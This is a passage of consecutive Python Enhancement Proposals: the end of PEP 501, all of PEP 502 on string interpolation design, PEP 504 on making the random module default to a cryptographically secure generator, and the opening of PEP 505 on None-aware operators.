exploring the feasibility of using this model of delayed rendering in i18n
use cases (even though the ultimate conclusion was that it was a poor fit,
at least for current approaches to i18n in Python)
References
%-formatting
str.format
string.Template documentation
PEP 215: String Interpolation
PEP 292: Simpler String Substitutions
PEP 3101: Advanced String Formatting
PEP 498: Literal string formatting
FormattableString and C# native string interpolation
IFormattable interface in C# (see remarks for globalization notes)
Running external commands in Julia
Copyright
This document has been placed in the public domain.
| Deferred | PEP 501 – General purpose string interpolation | Standards Track | PEP 498 proposes new syntactic support for string interpolation that is
transparent to the compiler, allow name references from the interpolation
operation full access to containing namespaces (as with any other expression),
rather than being limited to explicit name references. These are referred
to in the PEP as “f-strings” (a mnemonic for “formatted strings”). |
PEP 502 – String Interpolation - Extended Discussion
Author:
Mike G. Miller
Status:
Rejected
Type:
Informational
Created:
10-Aug-2015
Python-Version:
3.6
Table of Contents
Abstract
PEP Status
Motivation
Rationale
Goals
Limitations
Background
Printf-style formatting, via operator
string.Template Class
PEP 215 - String Interpolation
str.format() Method
PEP 498 – Literal String Formatting
PEP 501 – Translation ready string interpolation
Implementations in Other Languages
Bash
Perl
Ruby
Others
Scala
ES6 (Javascript)
C#, Version 6
Apple’s Swift
Additional examples
New Syntax
New String Prefix
Additional Topics
Safety
Mitigation via Tools
Style Guide/Precautions
Reference Implementation(s)
Backwards Compatibility
Postponed Ideas
Internationalization
Rejected Ideas
Restricting Syntax to str.format() Only
Additional/Custom String-Prefixes
Automated Escaping of Input Variables
Environment Access and Command Substitution
Acknowledgements
References
Copyright
Abstract
PEP 498: Literal String Interpolation, which proposed “formatted strings” was
accepted September 9th, 2015.
Additional background and rationale given during its design phase is detailed
below.
To recap that PEP,
a string prefix was introduced that marks the string as a template to be
rendered.
These formatted strings may contain one or more expressions
built on the existing syntax of str.format(). [10] [11]
The formatted string expands at compile-time into a conventional string format
operation,
with the given expressions from its text extracted and passed instead as
positional arguments.
At runtime,
the resulting expressions are evaluated to render a string to given
specifications:
>>> location = 'World'
>>> f'Hello, {location} !' # new prefix: f''
'Hello, World !' # interpolated result
Format-strings may be thought of as merely syntactic sugar to simplify traditional
calls to str.format().
PEP Status
This PEP was rejected based on its using an opinion-based tone rather than a factual one.
This PEP was also deemed not critical as PEP 498 was already written and should be the place
to house design decision details.
Motivation
Though string formatting and manipulation features are plentiful in Python,
one area where it falls short
is the lack of a convenient string interpolation syntax.
In comparison to other dynamic scripting languages
with similar use cases,
the amount of code necessary to build similar strings is substantially higher,
while at times offering lower readability due to verbosity, dense syntax,
or identifier duplication.
These difficulties are described at moderate length in the original
post to python-ideas
that started the snowball (that became PEP 498) rolling. [1]
Furthermore, replacement of the print statement with the more consistent print
function of Python 3 (PEP 3105) has added one additional minor burden,
an additional set of parentheses to type and read.
Combined with the verbosity of current string formatting solutions,
this puts an otherwise simple language at an unfortunate disadvantage to its
peers:
echo "Hello, user: $user, id: $id, on host: $hostname" # bash
say "Hello, user: $user, id: $id, on host: $hostname"; # perl
puts "Hello, user: #{user}, id: #{id}, on host: #{hostname}\n" # ruby
# 80 ch -->|
# Python 3, str.format with named parameters
print('Hello, user: {user}, id: {id}, on host: {hostname}'.format(**locals()))
# Python 3, worst case
print('Hello, user: {user}, id: {id}, on host: {hostname}'.format(user=user,
id=id,
hostname=
hostname))
In Python, the formatting and printing of a string with multiple variables in a
single line of code of standard width is noticeably harder and more verbose,
with indentation exacerbating the issue.
For use cases such as smaller projects, systems programming,
shell script replacements, and even one-liners,
where message formatting complexity has yet to be encapsulated,
this verbosity has likely lead a significant number of developers and
administrators to choose other languages over the years.
Rationale
Goals
The design goals of format strings are as follows:
Eliminate need to pass variables manually.
Eliminate repetition of identifiers and redundant parentheses.
Reduce awkward syntax, punctuation characters, and visual noise.
Improve readability and eliminate mismatch errors,
by preferring named parameters to positional arguments.
Avoid need for locals() and globals() usage,
instead parsing the given string for named parameters,
then passing them automatically. [2] [3]
Limitations
In contrast to other languages that take design cues from Unix and its
shells,
and in common with Javascript,
Python specified both single (') and double (") ASCII quote
characters to enclose strings.
It is not reasonable to choose one of them now to enable interpolation,
while leaving the other for uninterpolated strings.
Other characters,
such as the “Backtick” (or grave accent `) are also
constrained by history
as a shortcut for repr().
This leaves a few remaining options for the design of such a feature:
An operator, as in printf-style string formatting via %.
A class, such as string.Template().
A method or function, such as str.format().
New syntax, or
A new string prefix marker, such as the well-known r'' or u''.
The first three options above are mature.
Each has specific use cases and drawbacks,
yet also suffer from the verbosity and visual noise mentioned previously.
All options are discussed in the next sections.
Background
Formatted strings build on several existing techniques and proposals and what
we’ve collectively learned from them.
In keeping with the design goals of readability and error-prevention,
the following examples therefore use named,
not positional arguments.
Let’s assume we have the following dictionary,
and would like to print out its items as an informative string for end users:
>>> params = {'user': 'nobody', 'id': 9, 'hostname': 'darkstar'}
Printf-style formatting, via operator
This venerable technique continues to have its uses,
such as with byte-based protocols,
simplicity in simple cases,
and familiarity to many programmers:
>>> 'Hello, user: %(user)s, id: %(id)s, on host: %(hostname)s' % params
'Hello, user: nobody, id: 9, on host: darkstar'
In this form, considering the prerequisite dictionary creation,
the technique is verbose, a tad noisy,
yet relatively readable.
Additional issues are that an operator can only take one argument besides the
original string,
meaning multiple parameters must be passed in a tuple or dictionary.
Also, it is relatively easy to make an error in the number of arguments passed,
the expected type,
have a missing key,
or forget the trailing type, e.g. (s or d).
string.Template Class
The string.Template class from PEP 292
(Simpler String Substitutions)
is a purposely simplified design,
using familiar shell interpolation syntax,
with safe-substitution feature,
that finds its main use cases in shell and internationalization tools:
Template('Hello, user: $user, id: ${id}, on host: $hostname').substitute(params)
While also verbose, the string itself is readable.
Though functionality is limited,
it meets its requirements well.
It isn’t powerful enough for many cases,
and that helps keep inexperienced users out of trouble,
as well as avoiding issues with moderately-trusted input (i18n) from
third-parties.
It unfortunately takes enough code to discourage its use for ad-hoc string
interpolation,
unless encapsulated in a convenience library such as flufl.i18n.
PEP 215 - String Interpolation
PEP 215 was a former proposal of which this one shares a lot in common.
Apparently, the world was not ready for it at the time,
but considering recent support in a number of other languages,
its day may have come.
The large number of dollar sign ($) characters it included may have
led it to resemble Python’s arch-nemesis Perl,
and likely contributed to the PEP’s lack of acceptance.
It was superseded by the following proposal.
str.format() Method
The str.format() syntax of PEP 3101 is the most recent and modern of the
existing options.
It is also more powerful and usually easier to read than the others.
It avoids many of the drawbacks and limits of the previous techniques.
However, due to its necessary function call and parameter passing,
it runs from verbose to very verbose in various situations with
string literals:
>>> 'Hello, user: {user}, id: {id}, on host: {hostname}'.format(**params)
'Hello, user: nobody, id: 9, on host: darkstar'
# when using keyword args, var name shortening sometimes needed to fit :/
>>> 'Hello, user: {user}, id: {id}, on host: {host}'.format(user=user,
id=id,
host=hostname)
'Hello, user: nobody, id: 9, on host: darkstar'
The verbosity of the method-based approach is illustrated here.
PEP 498 – Literal String Formatting
PEP 498 defines and discusses format strings,
as also described in the Abstract above.
It also, somewhat controversially to those first exposed,
introduces the idea that format-strings shall be augmented with support for
arbitrary expressions.
This is discussed further in the
Restricting Syntax section under
Rejected Ideas.
PEP 501 – Translation ready string interpolation
The complimentary PEP 501 brings internationalization into the discussion as a
first-class concern, with its proposal of the i-prefix,
string.Template syntax integration compatible with ES6 (Javascript),
deferred rendering,
and an object return value.
Implementations in Other Languages
String interpolation is now well supported by various programming languages
used in multiple industries,
and is converging into a standard of sorts.
It is centered around str.format() style syntax in minor variations,
with the addition of arbitrary expressions to expand utility.
In the Motivation section it was shown how convenient interpolation syntax
existed in Bash, Perl, and Ruby.
Let’s take a look at their expression support.
Bash
Bash supports a number of arbitrary, even recursive constructs inside strings:
> echo "user: $USER, id: $((id + 6)) on host: $(echo is $(hostname))"
user: nobody, id: 15 on host: is darkstar
Explicit interpolation within double quotes.
Direct environment variable access supported.
Arbitrary expressions are supported. [4]
External process execution and output capture supported. [5]
Recursive expressions are supported.
Perl
Perl also has arbitrary expression constructs, perhaps not as well known:
say "I have @{[$id + 6]} guanacos."; # lists
say "I have ${\($id + 6)} guanacos."; # scalars
say "Hello { @names.join(', ') } how are you?"; # Perl 6 version
Explicit interpolation within double quotes.
Arbitrary expressions are supported. [6] [7]
Ruby
Ruby allows arbitrary expressions in its interpolated strings:
puts "One plus one is two: #{1 + 1}\n"
Explicit interpolation within double quotes.
Arbitrary expressions are supported. [8] [9]
Possible to change delimiter chars with %.
See the Reference Implementation(s) section for an implementation in Python.
Others
Let’s look at some less-similar modern languages recently implementing string
interpolation.
Scala
Scala interpolation is directed through string prefixes.
Each prefix has a different result:
s"Hello, $name ${1 + 1}" # arbitrary
f"$name%s is $height%2.2f meters tall" # printf-style
raw"a\nb" # raw, like r''
These prefixes may also be implemented by the user,
by extending Scala’s StringContext class.
Explicit interpolation within double quotes with literal prefix.
User implemented prefixes supported.
Arbitrary expressions are supported.
ES6 (Javascript)
Designers of Template strings faced the same issue as Python where single
and double quotes were taken.
Unlike Python however, “backticks” were not.
Despite their issues,
they were chosen as part of the ECMAScript 2015 (ES6) standard:
console.log(`Fifteen is ${a + b} and\nnot ${2 * a + b}.`);
Custom prefixes are also supported by implementing a function the same name
as the tag:
function tag(strings, ...values) {
console.log(strings.raw[0]); // raw string is also available
return "Bazinga!";
}
tag`Hello ${ a + b } world ${ a * b}`;
Explicit interpolation within backticks.
User implemented prefixes supported.
Arbitrary expressions are supported.
C#, Version 6
C# has a useful new interpolation feature as well,
with some ability to customize interpolation via the IFormattable
interface:
$"{person.Name, 20} is {person.Age:D3} year{(p.Age == 1 ? "" : "s")} old.";
Explicit interpolation with double quotes and $ prefix.
Custom interpolations are available.
Arbitrary expressions are supported.
Apple’s Swift
Arbitrary interpolation under Swift is available on all strings:
let multiplier = 3
let message = "\(multiplier) times 2.5 is \(Double(multiplier) * 2.5)"
// message is "3 times 2.5 is 7.5"
Implicit interpolation with double quotes.
Arbitrary expressions are supported.
Cannot contain CR/LF.
Additional examples
A number of additional examples of string interpolation may be
found at Wikipedia.
Now that background and history have been covered,
let’s continue on for a solution.
New Syntax
This should be an option of last resort,
as every new syntax feature has a cost in terms of real-estate in a brain it
inhabits.
There is however one alternative left on our list of possibilities,
which follows.
New String Prefix
Given the history of string formatting in Python and backwards-compatibility,
implementations in other languages,
avoidance of new syntax unless necessary,
an acceptable design is reached through elimination
rather than unique insight.
Therefore, marking interpolated string literals with a string prefix is chosen.
We also choose an expression syntax that reuses and builds on the strongest of
the existing choices,
str.format() to avoid further duplication of functionality:
>>> location = 'World'
>>> f'Hello, {location} !' # new prefix: f''
'Hello, World !' # interpolated result
PEP 498 – Literal String Formatting, delves into the mechanics and
implementation of this design.
Additional Topics
Safety
In this section we will describe the safety situation and precautions taken
in support of format-strings.
Only string literals have been considered for format-strings,
not variables to be taken as input or passed around,
making external attacks difficult to accomplish.str.format() and alternatives already handle this use-case.
Neither locals() nor globals() are necessary nor used during the
transformation,
avoiding leakage of information.
To eliminate complexity as well as RuntimeError (s) due to recursion
depth, recursive interpolation is not supported.
However,
mistakes or malicious code could be missed inside string literals.
Though that can be said of code in general,
that these expressions are inside strings means they are a bit more likely
to be obscured.
Mitigation via Tools
The idea is that tools or linters such as pyflakes, pylint, or Pycharm,
may check inside strings with expressions and mark them up appropriately.
As this is a common task with programming languages today,
multi-language tools won’t have to implement this feature solely for Python,
significantly shortening time to implementation.
Farther in the future,
strings might also be checked for constructs that exceed the safety policy of
a project.
Style Guide/Precautions
As arbitrary expressions may accomplish anything a Python expression is
able to,
it is highly recommended to avoid constructs inside format-strings that could
cause side effects.
Further guidelines may be written once usage patterns and true problems are
known.
Reference Implementation(s)
The say module on PyPI implements string interpolation as described here
with the small burden of a callable interface:
> pip install say
from say import say
nums = list(range(4))
say("Nums has {len(nums)} items: {nums}")
A Python implementation of Ruby interpolation is also available.
It uses the codecs module to do its work:
> pip install interpy
# coding: interpy
location = 'World'
print("Hello #{location}.")
Backwards Compatibility
By using existing syntax and avoiding current or historical features,
format strings were designed so as to not interfere with existing code and are
not expected to cause any issues.
Postponed Ideas
Internationalization
Though it was highly desired to integrate internationalization support,
(see PEP 501),
the finer details diverge at almost every point,
making a common solution unlikely: [15]
Use-cases differ
Compile vs. run-time tasks
Interpolation syntax needs
Intended audience
Security policy
Rejected Ideas
Restricting Syntax to str.format() Only
The common arguments against support of arbitrary expressions were:
YAGNI, “You aren’t gonna need it.”
The feature is not congruent with historical Python conservatism.
Postpone - can implement in a future version if need is demonstrated.
Support of only str.format() syntax however,
was deemed not enough of a solution to the problem.
Often a simple length or increment of an object, for example,
is desired before printing.
It can be seen in the Implementations in Other Languages section that the
developer community at large tends to agree.
String interpolation with arbitrary expressions is becoming an industry
standard in modern languages due to its utility.
Additional/Custom String-Prefixes
As seen in the Implementations in Other Languages section,
many modern languages have extensible string prefixes with a common interface.
This could be a way to generalize and reduce lines of code in common
situations.
Examples are found in ES6 (Javascript), Scala, Nim, and C#
(to a lesser extent).
This was rejected by the BDFL. [14]
Automated Escaping of Input Variables
While helpful in some cases,
this was thought to create too much uncertainty of when and where string
expressions could be used safely or not.
The concept was also difficult to describe to others. [12]
Always consider format string variables to be unescaped,
unless the developer has explicitly escaped them.
Environment Access and Command Substitution
For systems programming and shell-script replacements,
it would be useful to handle environment variables and capture output of
commands directly in an expression string.
This was rejected as not important enough,
and looking too much like bash/perl,
which could encourage bad habits. [13]
Acknowledgements
Eric V. Smith for the authoring and implementation of PEP 498.
Everyone on the python-ideas mailing list for rejecting the various crazy
ideas that came up,
helping to keep the final design in focus.
References
[1]
Briefer String Format
(https://mail.python.org/pipermail/python-ideas/2015-July/034659.html)
[2]
Briefer String Format
(https://mail.python.org/pipermail/python-ideas/2015-July/034669.html)
[3]
Briefer String Format
(https://mail.python.org/pipermail/python-ideas/2015-July/034701.html)
[4]
Bash Docs
(https://tldp.org/LDP/abs/html/arithexp.html)
[5]
Bash Docs
(https://tldp.org/LDP/abs/html/commandsub.html)
[6]
Perl Cookbook
(https://docstore.mik.ua/orelly/perl/cookbook/ch01_11.htm)
[7]
Perl Docs
(https://web.archive.org/web/20121025185907/https://perl6maven.com/perl6-scalar-array-and-hash-interpolation)
[8]
Ruby Docs
(http://ruby-doc.org/core-2.1.1/doc/syntax/literals_rdoc.html#label-Strings)
[9]
Ruby Docs
(https://en.wikibooks.org/wiki/Ruby_Programming/Syntax/Literals#Interpolation)
[10]
Python Str.Format Syntax
(https://docs.python.org/3.6/library/string.html#format-string-syntax)
[11]
Python Format-Spec Mini Language
(https://docs.python.org/3.6/library/string.html#format-specification-mini-language)
[12]
Escaping of Input Variables
(https://mail.python.org/pipermail/python-ideas/2015-August/035532.html)
[13]
Environment Access and Command Substitution
(https://mail.python.org/pipermail/python-ideas/2015-August/035554.html)
[14]
Extensible String Prefixes
(https://mail.python.org/pipermail/python-ideas/2015-August/035336.html)
[15]
Literal String Formatting
(https://mail.python.org/pipermail/python-dev/2015-August/141289.html)
Copyright
This document has been placed in the public domain.
| Rejected | PEP 502 – String Interpolation - Extended Discussion | Informational | PEP 498: Literal String Interpolation, which proposed “formatted strings” was
accepted September 9th, 2015.
Additional background and rationale given during its design phase is detailed
below. |
PEP 504 – Using the System RNG by default
Author:
Alyssa Coghlan <ncoghlan at gmail.com>
Status:
Withdrawn
Type:
Standards Track
Created:
15-Sep-2015
Python-Version:
3.6
Post-History:
15-Sep-2015
Table of Contents
Abstract
PEP Withdrawal
Proposal
Warning on implicit opt-in
Performance impact
Documentation changes
Rationale
Discussion
Why “ensure_repeatable” over “ensure_deterministic”?
Only changing the default for Python 3.6+
Keeping the module level functions
Warning when implicitly opting in to the deterministic RNG
Avoiding the introduction of a userspace CSPRNG
Isn’t the deterministic PRNG “secure enough”?
Security fatigue in the Python ecosystem
Acknowledgements
References
Copyright
Abstract
Python currently defaults to using the deterministic Mersenne Twister random
number generator for the module level APIs in the random module, requiring
users to know that when they’re performing “security sensitive” work, they
should instead switch to using the cryptographically secure os.urandom or
random.SystemRandom interfaces or a third party library like
cryptography.
Unfortunately, this approach has resulted in a situation where developers that
aren’t aware that they’re doing security sensitive work use the default module
level APIs, and thus expose their users to unnecessary risks.
This isn’t an acute problem, but it is a chronic one, and the often long
delays between the introduction of security flaws and their exploitation means
that it is difficult for developers to naturally learn from experience.
In order to provide an eventually pervasive solution to the problem, this PEP
proposes that Python switch to using the system random number generator by
default in Python 3.6, and require developers to opt-in to using the
deterministic random number generator process wide either by using a new
random.ensure_repeatable() API, or by explicitly creating their own
random.Random() instance.
To minimise the impact on existing code, module level APIs that require
determinism will implicitly switch to the deterministic PRNG.
PEP Withdrawal
During discussion of this PEP, Steven D’Aprano proposed the simpler alternative
of offering a standardised secrets module that provides “one obvious way”
to handle security sensitive tasks like generating default passwords and other
tokens.
Steven’s proposal has the desired effect of aligning the easy way to generate
such tokens and the right way to generate them, without introducing any
compatibility risks for the existing random module API, so this PEP has
been withdrawn in favour of further work on refining Steven’s proposal as
PEP 506.
Proposal
Currently, it is never correct to use the module level functions in the
random module for security sensitive applications. This PEP proposes to
change that admonition in Python 3.6+ to instead be that it is not correct to
use the module level functions in the random module for security sensitive
applications if random.ensure_repeatable() is ever called (directly or
indirectly) in that process.
To achieve this, rather than being bound methods of a random.Random
instance as they are today, the module level callables in random would
change to be functions that delegate to the corresponding method of the
existing random._inst module attribute.
By default, this attribute will be bound to a random.SystemRandom instance.
A new random.ensure_repeatable() API will then rebind the random._inst
attribute to a system.Random instance, restoring the same module level
API behaviour as existed in previous Python versions (aside from the
additional level of indirection):
def ensure_repeatable():
"""Switch to using random.Random() for the module level APIs
This switches the default RNG instance from the cryptographically
secure random.SystemRandom() to the deterministic random.Random(),
enabling the seed(), getstate() and setstate() operations. This means
a particular random scenario can be replayed later by providing the
same seed value or restoring a previously saved state.
NOTE: Libraries implementing security sensitive operations should
always explicitly use random.SystemRandom() or os.urandom in order to
correctly handle applications that call this function.
"""
if not isinstance(_inst, Random):
_inst = random.Random()
To minimise the impact on existing code, calling any of the following module
level functions will implicitly call random.ensure_repeatable():
random.seed
random.getstate
random.setstate
There are no changes proposed to the random.Random or
random.SystemRandom class APIs - applications that explicitly instantiate
their own random number generators will be entirely unaffected by this
proposal.
Warning on implicit opt-in
In Python 3.6, implicitly opting in to the use of the deterministic PRNG will
emit a deprecation warning using the following check:
if not isinstance(_inst, Random):
warnings.warn(DeprecationWarning,
"Implicitly ensuring repeatability. "
"See help(random.ensure_repeatable) for details")
ensure_repeatable()
The specific wording of the warning should have a suitable answer added to
Stack Overflow as was done for the custom error message that was added for
missing parentheses in a call to print [10].
In the first Python 3 release after Python 2.7 switches to security fix only
mode, the deprecation warning will be upgraded to a RuntimeWarning so it is
visible by default.
This PEP does not propose ever removing the ability to ensure the default RNG
used process wide is a deterministic PRNG that will produce the same series of
outputs given a specific seed. That capability is widely used in modelling
and simulation scenarios, and requiring that ensure_repeatable() be called
either directly or indirectly is a sufficient enhancement to address the cases
where the module level random API is used for security sensitive tasks in web
applications without due consideration for the potential security implications
of using a deterministic PRNG.
Performance impact
Due to the large performance difference between random.Random and
random.SystemRandom, applications ported to Python 3.6 will encounter a
significant performance regression in cases where:
the application is using the module level random API
cryptographic quality randomness isn’t needed
the application doesn’t already implicitly opt back in to the deterministic
PRNG by calling random.seed, random.getstate, or random.setstate
the application isn’t updated to explicitly call random.ensure_repeatable
This would be noted in the Porting section of the Python 3.6 What’s New guide,
with the recommendation to include the following code in the __main__
module of affected applications:
if hasattr(random, "ensure_repeatable"):
random.ensure_repeatable()
Applications that do need cryptographic quality randomness should be using the
system random number generator regardless of speed considerations, so in those
cases the change proposed in this PEP will fix a previously latent security
defect.
Documentation changes
The random module documentation would be updated to move the documentation
of the seed, getstate and setstate interfaces later in the module,
along with the documentation of the new ensure_repeatable function and the
associated security warning.
That section of the module documentation would also gain a discussion of the
respective use cases for the deterministic PRNG enabled by
ensure_repeatable (games, modelling & simulation, software testing) and the
system RNG that is used by default (cryptography, security token generation).
This discussion will also recommend the use of third party security libraries
for the latter task.
Rationale
Writing secure software under deadline and budget pressures is a hard problem.
This is reflected in regular notifications of data breaches involving personally
identifiable information [1], as well as with failures to take
security considerations into account when new systems, like motor vehicles
[2], are connected to the internet. It’s also the case that a lot of
the programming advice readily available on the internet [#search] simply
doesn’t take the mathematical arcana of computer security into account.
Compounding these issues is the fact that defenders have to cover all of
their potential vulnerabilities, as a single mistake can make it possible to
subvert other defences [11].
One of the factors that contributes to making this last aspect particularly
difficult is APIs where using them inappropriately creates a silent security
failure - one where the only way to find out that what you’re doing is
incorrect is for someone reviewing your code to say “that’s a potential
security problem”, or for a system you’re responsible for to be compromised
through such an oversight (and you’re not only still responsible for that
system when it is compromised, but your intrusion detection and auditing
mechanisms are good enough for you to be able to figure out after the event
how the compromise took place).
This kind of situation is a significant contributor to “security fatigue”,
where developers (often rightly [9]) feel that security engineers
spend all their time saying “don’t do that the easy way, it creates a
security vulnerability”.
As the designers of one of the world’s most popular languages [8],
we can help reduce that problem by making the easy way the right way (or at
least the “not wrong” way) in more circumstances, so developers and security
engineers can spend more time worrying about mitigating actually interesting
threats, and less time fighting with default language behaviours.
Discussion
Why “ensure_repeatable” over “ensure_deterministic”?
This is a case where the meaning of a word as specialist jargon conflicts with
the typical meaning of the word, even though it’s technically the same.
From a technical perspective, a “deterministic RNG” means that given knowledge
of the algorithm and the current state, you can reliably compute arbitrary
future states.
The problem is that “deterministic” on its own doesn’t convey those qualifiers,
so it’s likely to instead be interpreted as “predictable” or “not random” by
folks that are familiar with the conventional meaning, but aren’t familiar with
the additional qualifiers on the technical meaning.
A second problem with “deterministic” as a description for the traditional RNG
is that it doesn’t really tell you what you can do with the traditional RNG
that you can’t do with the system one.
“ensure_repeatable” aims to address both of those problems, as its common
meaning accurately describes the main reason for preferring the deterministic
PRNG over the system RNG: ensuring you can repeat the same series of outputs
by providing the same seed value, or by restoring a previously saved PRNG state.
Only changing the default for Python 3.6+
Some other recent security changes, such as upgrading the capabilities of the
ssl module and switching to properly verifying HTTPS certificates by
default, have been considered critical enough to justify backporting the
change to all currently supported versions of Python.
The difference in this case is one of degree - the additional benefits from
rolling out this particular change a couple of years earlier than will
otherwise be the case aren’t sufficient to justify either the additional effort
or the stability risks involved in making such an intrusive change in a
maintenance release.
Keeping the module level functions
In additional to general backwards compatibility considerations, Python is
widely used for educational purposes, and we specifically don’t want to
invalidate the wide array of educational material that assumes the availability
of the current random module API. Accordingly, this proposal ensures that
most of the public API can continue to be used not only without modification,
but without generating any new warnings.
Warning when implicitly opting in to the deterministic RNG
It’s necessary to implicitly opt in to the deterministic PRNG as Python is
widely used for modelling and simulation purposes where this is the right
thing to do, and in many cases, these software models won’t have a dedicated
maintenance team tasked with ensuring they keep working on the latest versions
of Python.
Unfortunately, explicitly calling random.seed with data from os.urandom
is also a mistake that appears in a number of the flawed “how to generate a
security token in Python” guides readily available online.
Using first DeprecationWarning, and then eventually a RuntimeWarning, to
advise against implicitly switching to the deterministic PRNG aims to
nudge future users that need a cryptographically secure RNG away from
calling random.seed() and those that genuinely need a deterministic
generator towards explicitly calling random.ensure_repeatable().
Avoiding the introduction of a userspace CSPRNG
The original discussion of this proposal on python-ideas[#csprng]_ suggested
introducing a cryptographically secure pseudo-random number generator and using
that by default, rather than defaulting to the relatively slow system random
number generator.
The problem [7] with this approach is that it introduces an additional
point of failure in security sensitive situations, for the sake of applications
where the random number generation may not even be on a critical performance
path.
Applications that do need cryptographic quality randomness should be using the
system random number generator regardless of speed considerations, so in those
cases.
Isn’t the deterministic PRNG “secure enough”?
In a word, “No” - that’s why there’s a warning in the module documentation
that says not to use it for security sensitive purposes. While we’re not
currently aware of any studies of Python’s random number generator specifically,
studies of PHP’s random number generator [3] have demonstrated the ability
to use weaknesses in that subsystem to facilitate a practical attack on
password recovery tokens in popular PHP web applications.
However, one of the rules of secure software development is that “attacks only
get better, never worse”, so it may be that by the time Python 3.6 is released
we will actually see a practical attack on Python’s deterministic PRNG publicly
documented.
Security fatigue in the Python ecosystem
Over the past few years, the computing industry as a whole has been
making a concerted effort to upgrade the shared network infrastructure we all
depend on to a “secure by default” stance. As one of the most widely used
programming languages for network service development (including the OpenStack
Infrastructure-as-a-Service platform) and for systems administration
on Linux systems in general, a fair share of that burden has fallen on the
Python ecosystem, which is understandably frustrating for Pythonistas using
Python in other contexts where these issues aren’t of as great a concern.
This consideration is one of the primary factors driving the substantial
backwards compatibility improvements in this proposal relative to the initial
draft concept posted to python-ideas [6].
Acknowledgements
Theo de Raadt, for making the suggestion to Guido van Rossum that we
seriously consider defaulting to a cryptographically secure random number
generator
Serhiy Storchaka, Terry Reedy, Petr Viktorin, and anyone else in the
python-ideas threads that suggested the approach of transparently switching
to the random.Random implementation when any of the functions that only
make sense for a deterministic RNG are called
Nathaniel Smith for providing the reference on practical attacks against
PHP’s random number generator when used to generate password reset tokens
Donald Stufft for pursuing additional discussions with network security
experts that suggested the introduction of a userspace CSPRNG would mean
additional complexity for insufficient gain relative to just using the
system RNG directly
Paul Moore for eloquently making the case for the current level of security
fatigue in the Python ecosystem
References
[1]
Visualization of data breaches involving more than 30k records (each)
(http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/)
[2]
Remote UConnect hack for Jeep Cherokee
(http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/)
[3]
PRNG based attack against password reset tokens in PHP applications
(https://media.blackhat.com/bh-us-12/Briefings/Argyros/BH_US_12_Argyros_PRNG_WP.pdf)
[4]
Search link for “python password generator”
(https://www.google.com.au/search?q=python+password+generator)
[5]
python-ideas thread discussing using a userspace CSPRNG
(https://mail.python.org/pipermail/python-ideas/2015-September/035886.html)
[6]
Initial draft concept that eventually became this PEP
(https://mail.python.org/pipermail/python-ideas/2015-September/036095.html)
[7]
Safely generating random numbers
(http://sockpuppet.org/blog/2014/02/25/safely-generate-random-numbers/)
[8]
IEEE Spectrum 2015 Top Ten Programming Languages
(http://spectrum.ieee.org/computing/software/the-2015-top-ten-programming-languages)
[9]
OWASP Top Ten Web Security Issues for 2013
(https://www.owasp.org/index.php/OWASP_Top_Ten_Project#tab=OWASP_Top_10_for_2013)
[10]
Stack Overflow answer for missing parentheses in call to print
(http://stackoverflow.com/questions/25445439/what-does-syntaxerror-missing-parentheses-in-call-to-print-mean-in-python/25445440#25445440)
[11]
Bypassing bcrypt through an insecure data cache
(http://arstechnica.com/security/2015/09/once-seen-as-bulletproof-11-million-ashley-madison-passwords-already-cracked/)
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 504 – Using the System RNG by default | Standards Track | Python currently defaults to using the deterministic Mersenne Twister random
number generator for the module level APIs in the random module, requiring
users to know that when they’re performing “security sensitive” work, they
should instead switch to using the cryptographically secure os.urandom or
random.SystemRandom interfaces or a third party library like
cryptography. |
PEP 505 – None-aware operators
Author:
Mark E. Haase <mehaase at gmail.com>, Steve Dower <steve.dower at python.org>
Status:
Deferred
Type:
Standards Track
Created:
18-Sep-2015
Python-Version:
3.8
Table of Contents
Abstract
Syntax and Semantics
Specialness of None
Grammar changes
The coalesce rule
The maybe-dot and maybe-subscript operators
Reading expressions
Examples
Standard Library
jsonify
Grab
Rejected Ideas
No-Value Protocol
Boolean-aware operators
Exception-aware operators
None-aware Function Call
? Unary Postfix Operator
Built-in maybe
Just use a conditional expression
References
Copyright
Abstract
Several modern programming languages have so-called “null-coalescing” or
“null- aware” operators, including C# [1], Dart [2], Perl, Swift, and PHP
(starting in version 7). There are also stage 3 draft proposals for their
addition to ECMAScript (a.k.a. JavaScript) [3] [4]. These operators provide
syntactic sugar for common patterns involving null references.
The “null-coalescing” operator is a binary operator that returns its left
operand if it is not null. Otherwise it returns its right operand.
The “null-aware member access” operator accesses an instance member only
if that instance is non-null. Otherwise it returns null. (This is also
called a “safe navigation” operator.)
The “null-aware index access” operator accesses an element of a collection
only if that collection is non-null. Otherwise it returns null. (This
is another type of “safe navigation” operator.)
This PEP proposes three None-aware operators for Python, based on the
definitions and other language’s implementations of those above. Specifically:
The “None coalescing” binary operator ?? returns the left hand side
if it evaluates to a value that is not None, or else it evaluates and
returns the right hand side. A coalescing ??= augmented assignment
operator is included.
The “None-aware attribute access” operator ?. (“maybe dot”) evaluates
the complete expression if the left hand side evaluates to a value that is
not None
The “None-aware indexing” operator ?[] (“maybe subscript”) evaluates
the complete expression if the left hand site evaluates to a value that is
not None
See the Grammar changes section for specifics and examples of the required
grammar changes.
See the Examples section for more realistic examples of code that could be
updated to use the new operators.
Syntax and Semantics
Specialness of None
The None object denotes the lack of a value. For the purposes of these
operators, the lack of a value indicates that the remainder of the expression
also lacks a value and should not be evaluated.
A rejected proposal was to treat any value that evaluates as “false” in a
Boolean context as not having a value. However, the purpose of these operators
is to propagate the “lack of value” state, rather than the “false” state.
Some argue that this makes None special. We contend that None is
already special, and that using it as both the test and the result of these
operators does not change the existing semantics in any way.
See the Rejected Ideas section for discussions on alternate approaches.
Grammar changes
The following rules of the Python grammar are updated to read:
augassign: ('+=' | '-=' | '*=' | '@=' | '/=' | '%=' | '&=' | '|=' | '^=' |
'<<=' | '>>=' | '**=' | '//=' | '??=')
power: coalesce ['**' factor]
coalesce: atom_expr ['??' factor]
atom_expr: ['await'] atom trailer*
trailer: ('(' [arglist] ')' |
'[' subscriptlist ']' |
'?[' subscriptlist ']' |
'.' NAME |
'?.' NAME)
The coalesce rule
The coalesce rule provides the ?? binary operator. Unlike most binary
operators, the right-hand side is not evaluated until the left-hand side is
determined to be None.
The ?? operator binds more tightly than other binary operators as most
existing implementations of these do not propagate None values (they will
typically raise TypeError). Expressions that are known to potentially
result in None can be substituted for a default value without needing
additional parentheses.
Some examples of how implicit parentheses are placed when evaluating operator
precedence in the presence of the ?? operator:
a, b = None, None
def c(): return None
